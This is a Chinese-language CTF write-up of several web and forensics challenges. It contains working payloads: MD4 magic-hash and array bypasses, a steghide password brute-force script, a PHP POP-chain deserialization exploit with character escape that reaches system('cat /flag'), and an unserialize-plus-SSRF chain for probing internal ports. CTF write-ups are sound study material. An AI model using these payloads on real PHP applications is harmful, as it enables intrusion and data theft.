主动
命令执行 只是过滤了关键字flag 通配符绕过即可
Funhash
Level1用形如0e+纯数字且md4加密后依旧为0e+纯数字的值绕过
hash1=0e399638706240815825137256701449
这里难点主要是网上找不到符合要求的值,要自己写脚本碰撞
https://www.cnblogs.com/-mo-/p/11582424.html 我是拿md5的改了一下,然后跑了半天没出来,还好队友跑出来了
Level2 Level3用数组就行
Level4 和这篇文章的一样直接用就行https://blog.csdn.net/iczfy585/article/details/106081299
?hash1=0e399638706240815825137256701449&hash2[]=2&hash3[]=3&hash4=ffifdyop
upload
附件是个流量包,可以看出上传了一个图片文件
且提示使用了steghide处理文件
driftnet -f data.pcapng -a -d /root/Desktop
分离出一张图片
使用steghide 提取出文件即可 steghide extract -sf 1.jpg -p 123456
这里的密码直接猜,或者搞个脚本爆破
#bruteStegHide.sh
#!/bin/bash
for line in `cat $2`;do
steghide extract -sf $1 -p $line > /dev/null 2>&1
if [[ $? -eq 0 ]];then
echo 'password is: '$line
exit
fi
done
./bruteStegHide.sh test.jpg passwd.txt
还有两题是没做出来的题参考ying师傅的wp过一遍
https://www.gem-love.com/ctf/2576.html
web辅助
这题就是pop链加上字符逃逸
- topsolo类下将midsolo类作为方法调用 -> midsolo类触发__invoke() ->
Gank()函数中stristr($this->name, ‘Yasuo’) 通过name=jungle类->
jungle类触发__toString() -> KS() -> system(‘cat /flag’)
stristr()函数
当时一直没想到stristr($this->name, ‘Yasuo’)这里把name当作字符串查找也可以触发__toString(),看了一圈echo都是写死的,就不知道咋办了
自己测试了一下
<?php
class TestClass
{
public $foo;
public function __construct($foo)
{
$this->foo = $foo;
}
public function __toString() {
echo "Yasuo is best!<br/>";
system("dir");
}
}
function Gank($class){
if (stristr($class, 'Yasuo')){
echo "Are you orphan?\n";
}
else{
echo "Must Be Yasuo!\n";
}
}
$class = new TestClass('Hello');
$a = Gank($class);
?>
<?php
class topsolo{
protected $name;
public function __construct($name = 'Riven'){
$this->name = $name;
}
}
class midsolo{
protected $name;
public function __construct($name){
$this->name = $name;
}
}
class jungle{
protected $name = "";
public function __construct($name = "Lee Sin"){
$this->name = $name;
}
}
$aa=serialize(new topsolo(new midsolo(new jungle)));
echo $aa;
?>
O:7:"topsolo":1:{s:7:"*name";O:7:"midsolo":1:{s:7:"*name";O:6:"jungle":1:{s:7:"*name";s:7:"Lee Sin";}}}
还有一个__wakeup()修改属性个数绕过,不然无法将name设置为我们需要的值
这里还有一个check函数,过滤了name关键字,通过hex绕过 将name替换为\6E\61\6D\65
O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}
再就是有个字符逃逸 一组\0*\0能吞掉2个字符 ";s:7:“0*0pass;s:155:” 要这段吞掉 22位
PHP字符逃逸导致的对象注入详解:
和DASCTF 四月赛的差不多https://blog.csdn.net/weixin_43610673/article/details/105754341
?username=test\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;s:4:"test";O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}s:1:"a";s:1"a
最后进行urlencode
?username=test%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0&password=%3Bs%3A4%3A%22test%22%3BO%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A7%3A%22midsolo%22%3A3%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3Bs%3A7%3A%22Lee+Sin%22%3B%7D%7D%7Ds%3A1%3A%22a%22%3Bs%3A1%22a
half_infiltration
<?php
highlight_file(__FILE__);
$flag=file_get_contents('ssrf.php');
class Pass
{
function read()
{
ob_start();
global $result;
print $result;
}
}
class User
{
public $age,$sex,$num;
function __destruct()
{
$student = $this->age;
$boy = $this->sex;
$a = $this->num;
$student->$boy();
if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
{
ob_end_clean();
exit();
}
global $$a;
$result=$GLOBALS['flag'];
ob_end_clean();
}
}
if (isset($_GET['x'])) {
unserialize($_GET['x'])->get_it();
}
但这里有个缓冲区,不然没有输出,构造一个fatal error (比赛的时候就是卡在这个地方)
<?php
class Pass{
}
class User{
public $age,$sex,$num;
}
$q = new User;
$q->age = new Pass;
$q->sex = 'read';
$q->num = 'result';
$c = new User;
$c->age = new Pass;
$c->sex = 'read';
$c->num = this;
$ser = serialize([$q,$c]);
var_dump($ser);
?>
?x=a:2:{i:0;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:6:"result";}i:1;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:4:"this";}}
<?php
//经过扫描确认35000以下端口以及50000以上端口不存在任何内网服务,请继续渗透内网
$url = $_GET['we_have_done_ssrf_here_could_you_help_to_continue_it'] ?? false;
if(preg_match("/flag|var|apache|conf|proc|log/i" ,$url)){
die("");
}
if($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_exec($ch);
curl_close($ch);
}
?>
通过爆破可以得到,40000端口有一个上传功能
/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=http://127.0.0.1:40000
再下面我没试出来,可能是比赛结束了的原因